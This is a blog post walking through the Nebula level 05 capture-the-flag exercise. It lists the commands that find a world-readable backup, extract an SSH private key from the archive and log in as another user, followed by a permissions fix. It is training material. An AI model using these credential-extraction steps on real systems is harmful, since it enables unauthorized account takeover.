blog.ferling.eu by Benedikt Ferling


 

exploit-exercises.com/nebula -- Level 05

Problem

  1. Default permit! A backup that is world-readable.

Exploit

A look into the directory of /home/flag05 reveals that there is a backup-directory which is world-readable.

1
ls -lah /home/flag05/

A look into that directory reveals a backup file which is world-readable.

1
ls -lah /home/flag05/.backup

We can view the contents of the file with:

1
tar -vztf /home/flag05/.backup/backup-19072011.tgz

This reveals, that there is a private key inside that archive. Our aim: Extract the key and login as flag05 with the key. Do that by:

1
2
3
tar -Oxzf /home/flag05/.backup/backup-19072011.tgz .ssh/id_rsa > /home/level05/id_rsa
chmod 0600 /home/level05/id_rsa
ssh -i id_rsa flag05@localhost

Logged in as user flag05 we can execute getflag.

Lesson / How to fix

  1. Use restrict permissions! Protect your backups as good as your data!
1
2
chmod 0700 /home/flag05/.backup
chmod 0600 /home/flag05/.backup/backup-19072011.tgz

other levels…

00 01 02 03 04 05 06 07 08 09
10 11 12 13 14 15 16 17 18 19